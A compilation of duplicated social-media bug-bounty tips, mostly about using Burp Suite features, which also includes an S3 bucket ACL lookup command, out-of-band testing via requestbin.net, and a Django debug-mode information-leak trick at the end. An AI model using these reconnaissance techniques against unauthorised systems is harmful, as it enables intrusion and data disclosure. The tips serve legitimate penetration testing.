#BurpHacksForBounties - Day 1/30
Turbo intruder: Power of Python with Burp Suite Intruder.
I use it to tailor my pen-testing for a specific target and targetted #bugbounty
#infosec #appsec #bugbountytips #bugbountytip #security
How to - 🧵🙃👇
Turbo intruder: Power of Python with Burp Suite Intruder.
I use it to tailor my pen-testing for a specific target and targetted #bugbounty
#infosec #appsec #bugbountytips #bugbountytip #security
How to - 🧵🙃👇
♥️ #BurpHacksForBounties - Day 3/30 ♥️
🔍🔎
Find References: The most underrated and underused feature of Burp Suite
Pro Only & Can find references for URIs across the entire Burp.
A short thread : 🧵👇
#infosec #appsec #security #burp #bugbountytip #bugbountytips
🔍🔎
Find References: The most underrated and underused feature of Burp Suite
Pro Only & Can find references for URIs across the entire Burp.
A short thread : 🧵👇
#infosec #appsec #security #burp #bugbountytip #bugbountytips
🍺🤡 #BurpHacksForBounties - Day 4/30
Don't ignore junk-looking information in Burp Suite.
Keep this setting on, and play with zipped data in Burp Suite.
🤫🤫 You can change zipped data in req
Learned from @stokfredrik
#infosec #appsec #security #burp #bugbountytips #bugbountytip
Don't ignore junk-looking information in Burp Suite.
Keep this setting on, and play with zipped data in Burp Suite.
🤫🤫 You can change zipped data in req
Learned from @stokfredrik
#infosec #appsec #security #burp #bugbountytips #bugbountytip
Got a S3 bucket but don't know who is the owner?
Use the below command to check the bucket owner
#bugbountytip #bugbountytips #infosec #AWS
Use the below command to check the bucket owner
aws s3api get-bucket-acl --bucket bucket-name#bugbountytip #bugbountytips #infosec #AWS
🚨🚨🤓 #BurpHacksForBounties - Day 9/30
Following parameter in Burp Suite repeater's response.
A time-saver tip that I read from @sw33tLie reply in the thread by @codingo_
👇🔽⬇️
#security #appsec #burp #bugbountytips #bugbountytip
Following parameter in Burp Suite repeater's response.
A time-saver tip that I read from @sw33tLie reply in the thread by @codingo_
👇🔽⬇️
#security #appsec #burp #bugbountytips #bugbountytip
#BurpHacksForBounties - Day 12/30
IPtables + Burp Suite + Android Applications. 😍🤓🤫😀
Tricky and length but worth setting up.
#burp #bugbountytips #infosec #security #appsec #bugbountytip
IPtables + Burp Suite + Android Applications. 😍🤓🤫😀
Tricky and length but worth setting up.
#burp #bugbountytips #infosec #security #appsec #bugbountytip
#BurpHacksForBounties - Tip 14/30
Burp Suite Config provides options for handling configurations for User-level and project-level options.
I personally use this configuration :
#appsec #infosec #burp #bugbountytips #bugbountytip
Burp Suite Config provides options for handling configurations for User-level and project-level options.
I personally use this configuration :
#appsec #infosec #burp #bugbountytips #bugbountytip
#BurpHacksForBounties - Day 18/30
Do you want to filter the responses in Burp Suite Intruder? And only show the ones which have specific pattern present in response?
If yes try this 👇🏻 🧵
#appsec #infosec #bugbountytips #bugbountytip #burp
Do you want to filter the responses in Burp Suite Intruder? And only show the ones which have specific pattern present in response?
If yes try this 👇🏻 🧵
#appsec #infosec #bugbountytips #bugbountytip #burp
#BurpHacksForBounties - Day 22/30
🤓🤓 Create your own Burp Extender Plugin in 3 tweets with Java.
Thank you Burp Suite for making it easy
#infosec #appsec #burp @BurpSuiteGuide #bugbountytips #bugbountytip #security
🤓🤓 Create your own Burp Extender Plugin in 3 tweets with Java.
Thank you Burp Suite for making it easy
#infosec #appsec #burp @BurpSuiteGuide #bugbountytips #bugbountytip #security
This media is not supported in your browser
VIEW IN TELEGRAM
#BurpHacksForBounties - Day 24/30
This is an amazing writeup which talks about using plugin in Burp that ease the journey for catching IDORs.
Writeup link: https://infosecwriteups.com/leveraging-burp-suite-extension-for-finding-idor-insecure-direct-object-reference-2653f9b89fd4
By
@dhanush
#infosec #appsec #bugbountytips #bugbountytip #bugbounty #security
This is an amazing writeup which talks about using plugin in Burp that ease the journey for catching IDORs.
Writeup link: https://infosecwriteups.com/leveraging-burp-suite-extension-for-finding-idor-insecure-direct-object-reference-2653f9b89fd4
By
@dhanush
#infosec #appsec #bugbountytips #bugbountytip #bugbounty #security
This media is not supported in your browser
VIEW IN TELEGRAM
#BurpHacksForBounties - Day 28/30 - Super CSRF POC Generator Hack.
CSRF POC generator is only available in Burp Suite pro, but not anymore.
Use this -> https://github.com/merttasci/csrf-poc-generator by @mertistaken
#infosec #burp #appsec #security #bugbountytips #bugbountytip #cybersecurity
CSRF POC generator is only available in Burp Suite pro, but not anymore.
Use this -> https://github.com/merttasci/csrf-poc-generator by @mertistaken
#infosec #burp #appsec #security #bugbountytips #bugbountytip #cybersecurity
#BurpHacksForBounties - Day 29/30
No Collaborator No worries
Burp Suite Collaborator is part of pro, so use requestbin.net
- Exactly same as collaborator
- Free 20 requests without login
- HTTP bin
- DNS bin
#infosec #appsec #bugbountytips #bugbountytip #burp
No Collaborator No worries
Burp Suite Collaborator is part of pro, so use requestbin.net
- Exactly same as collaborator
- Free 20 requests without login
- HTTP bin
- DNS bin
#infosec #appsec #bugbountytips #bugbountytip #burp
Django Debug Mode Bypass
https://target/login?next=/#bugbounty #bugbountytips #bugbountytip
https://target/admin
[301 to https://target/admin/login/?next=/admin/]
Change request to [POST]
[500 Django DEBUG mode and vary bad information]